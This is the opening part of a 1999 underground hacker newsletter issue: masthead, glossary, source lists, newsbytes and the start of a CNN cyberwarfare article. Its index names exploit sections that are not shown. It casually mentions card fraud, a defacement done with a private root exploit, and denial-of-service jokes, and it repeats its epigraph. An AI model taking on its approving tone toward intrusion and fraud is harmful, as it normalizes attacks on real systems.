Copy Link
Add to Bookmark
Report
hwa-hn21
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 21 Volume 1 1999 June 5th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
and airportman for the Cubesoft bandwidth. Also shouts out to all our
* mirror sites! tnx guys.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
* Other mirror sites are listed in appendix A.1
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #21
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #21
In 1995, a New Jersey farmer yanked up a cable with his backhoe,
knocking out 60 percent of the regional and long distance phone
service in New York City and air traffic control functions in Boston,
New York and Washington. In 1996, a rodent chewed through a cable
in Palo Alto, California, and knocked Silicon Valley off the Internet for
hours. In 1995, a New Jersey farmer yanked up a cable with his backhoe,
knocking out 60 percent of the regional and long distance phone
service in New York City and air traffic control functions in Boston,
New York and Washington. In 1996, a rodent chewed through a cable
in Palo Alto, California, and knocked Silicon Valley off the Internet for
hours.
- CNN
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Bracing for guerrilla warfare in cyberspace (CNN)................
04.0 .. The hacker from and administrators point of view (system)........
05.0 .. Retaliation against the FBI continues............................
06.0 .. Threat to online privacy: The Search Warrant.....................
07.0 .. 2600 in Aussieland bares its teeth at the current clampdown on The Net
08.0 .. Can the CIA break into banks?....................................
09.0 .. Emmanuel Goldstein Interview ....................................
10.0 .. DOD Unplugs From Net as Another Gov Site Gets Hit ...............
11.0 .. UCITA About to be Approved ......................................
12.0 .. Japan Follows Australia in Limiting Privacy .....................
13.0 .. AGNPAC Revealed .................................................
14.0 .. Bomb Making Info Available, For Nukes! ..........................
15.0 .. Exploit code for remote ipop2d security vulnerability that gives attacker a shell as user 'nobody'
16.0 .. Netscape Communicator 4.x "view-source:" JavaScript based security vulnerability
17.0 .. Vulnerability in Broker FTP Server v. 3.0 Build 1................
18.0 .. whois_raw.cgi problem............................................
19.0 .. Linux kernel 2.2.x vulnerability/exploit.........................
20.0 .. New Allaire Security Bulletin (ASB99-09).........................
21.0 .. sdtcm_convert Overflow Exploits( for Intel Solaris 7)............
22.0 .. ActiveState Security Advisory....................................
23.0 .. Exploit in Internet Explorer 5.0.................................
24.0 .. IRIX 6.5 nsd virtual filesystem vulnerability....................
25.0 .. a practical attack against ZKS Freedom...........................
26.0 .. DoS against PC Anywhere..........................................
27.0 .. weaknesses in dns label decoding, denial of service attack (code included) (fwd)
28.0 .. Microsoft Worker Raided .........................................
29.0 .. Is the FBI Missing the Point? ...................................
30.0 .. Norwegian Newspaper Cracked .....................................
31.0 .. Student Busted for Changing Grades ..............................
32.0 .. FBI Lobbying Group Pushes for EavesDropping Capability ..........
33.0 .. Cons, Cons and more Cons ........................................
34.0 .. Friday June 4th: FREE KEVIN Demonstrations Today! ..............
35.0 .. Germany Frees Crypto ............................................
36.0 .. US Congress Demands Echelon Docs ................................
37.0 .. Windows2000 Already Available ...................................
38.0 .. NetBus Takes #1 Spot ............................................
39.0 .. [ISN] Police will have 24-hour access to secret files............
40.0 .. [ISN] Hack attack knocks out FBI site............................
41.0 .. [ISN] What's a Little Hacking Between Friends?...................
42.0 .. [ISN] New hacker attack uses screensavers........................
43.0 .. [ISN] Hackers beware: IBM to sharpen Haxor.......................
44.0 .. [ISN] Feds Fend Off HACK3RZ......................................
45.0 .. [ISN] High-tech snooping tools developed for spy agency..........
46.0 .. [ISN] Privacy issues have taken center stage.....................
47.0 .. [ISN] Whitehouse to punish Hackers...............................
48.0 .. [ISN] Federal Cybercrime unit hunts for hackers..................
49.0 .. [ISN] Hong Kong Computer Hacking Syndicate Smashed...............
50.0 .. [ISN] New Tools Prevent Network Attacks..........................
51.0 .. [ISN] U.K. Crypto Policy May Have Hidden Agenda..................
52.0 .. [ISN] Tackling E-Privacy in New York.............................
53.0 .. [ISN] Congress, NSA butt heads over Echelon......................
54.0 .. [ISN] Visa, Wells Fargo Deliver E-Payment Alternatives...........
55.0 .. [ISN] Protocols serve up VPN security............................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD Computer Underground Digest...<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+Security................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+Security................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+Security................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
News site+Security related site...<a href="http://www.403-security.org/">http://www.403-security.org/</a>
News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="http://www.cnn.com/SEARCH/">Link</a>
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
http://www.ottawacitizen.com/business/
<a href="http://www.ottawacitizen.com/business/">Link</a>
http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
http://www.zdnet.com/zdtv/cybercrime/
<a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="http://freespeech.org/eua/">Link</a>
http://ech0.cjb.net ech0 Security
<a href="http://ech0.cjb.net">Link</a>
http://axon.jccc.net/hir/ Hackers Information Report
<a href="http://axon.jccc.net/hir/">Link</a>
http://net-security.org Net Security
<a href="http://net-security.org">Link</a>
http://www.403-security.org Daily news and security related site
<a href="http://www.403-security.org">Link</a>
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security
Shouts to tekz from HK for asking nicely in eye-are-see! ;-)
and to t4ck for making my night albeit I couldn't stick around for
the rest of the comedy routine. hacked star dot star with phf huh?
.... ;-))
and the #innerpulse, crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ INN Gone?
From ProjectGamma http://www.projectgamma.com/news/34.html
June 2, 1999, 00:09
Author: WHiTe VaMPiRe
Innerpulse News Network (INN) has a message on their Web site stating that it was taken down by
order of the U.S. government for transmitting military secrets to the Chinese.
The validity of this message is unknown. It could just be another joke perpetuated by s1ko, the
Webmaster of INN. Once Project Gamma discovers the validity of the message you will be the first
to know.
Related links:
Innerpulse News Network
http://www.innerpulse.com/
++ Ultratech Hacked by Infiltrators Inc.
From ProjectGamma, http://www.projectgamma.com/news/38.html
June 3, 1999, 01:13
Author: nexus
Ultratech-is.net was recently hacked by a new group on the net named Infiltrators Inc.,
a new security group formed by "nexus." Officials at Ultratech were alerted to the
security breach and have secured the server with the help of Infiltrators Inc.
Ultratech's site remained "altered" for approximately 5 hours, and was still undiscovered
by admins. The group then removed the altered page and reposted the origional as the admins
still did not notice. The site was hacked using a private exploit made by Shiva2000 of
Infiltrators Inc. to gain root access. This is the first webpage altered by the group, who
was founded May 24, 1999.
Related Links:
Ultratech website
http://www.ultratech-is.net
Reported by nexus
++ OpenSEC Mailing List
From HNN http://www.hackernews.com/
contributed by cult_hero
A new mailing list has popped up called OpenSEC (Open
Security Solutions). This list is dedicated to announcing
the latest versions of free and Open Source security
tools. For more information,
Open Security Solutions
http://www.opensec.net
++ HIR #9
From HNN http://www.hackernews.com/
contributed by h_i_r
HiR E-Zine Crew brings forth Hackers Information
Report: Issue #9. Covered in HiR 9: An Operating
system comparison (FreeBSD, RedHat 5.2, and NT4),
**How to make your own Acoustic coupler**, and all
sorts of other goodies and cool stuff. Check it out.
HiR Distro Site
http://axon.jccc.net/hir/
++ The New Antidote is Available.
From HNN http://www.hackernews.com/
contributed by Lord Oak
With more info on Cold Fusion Fixes, Bomb making
information on the net, and Social Engineering, Antidote
has released its newest issue.
Antidote Volume 2 Issue 6
http://www.thepoison.org/antidote/issues/vol2/6.txt
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
NO mail this week for posting here!
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
*
*#21? yep, enjoy ...
*
*
*
*
*
*
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 [CNN] Bracing for querrilla warfare in cyberspace
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bracing for guerrilla warfare in cyberspace
http://www.cnn.com/TECH/specials/hackers/cyberterror/
'There are lots of opportunities; that's very scary'
April 6, 1999
Web posted at: 2:29 p.m. EDT (1829 GMT)
By John Christensen
CNN Interactive
(CNN) -- It is June, the children are out of school, and as highways and airports fill with vacationers, rolling
power outages hit sections of Los Angeles, Chicago, Washington and New York. An airliner is mysteriously
knocked off the flight control system and crashes in Kansas.
Parts of the 911 service in Washington fail, supervisors at the Department of Defense discover that their e-mail
and telephone services are disrupted and officers aboard a U.S. Navy cruiser find that their computer systems have
been attacked.
As incidents mount, the stock market drops precipitously, and panic surges through the population.
Unlikely? Hardly. The "electronic Pearl Harbor" that White House terrorism czar Richard A. Clarke fears is not
just a threat, it has already happened.
Much of the scenario above --
except for the plane and stock
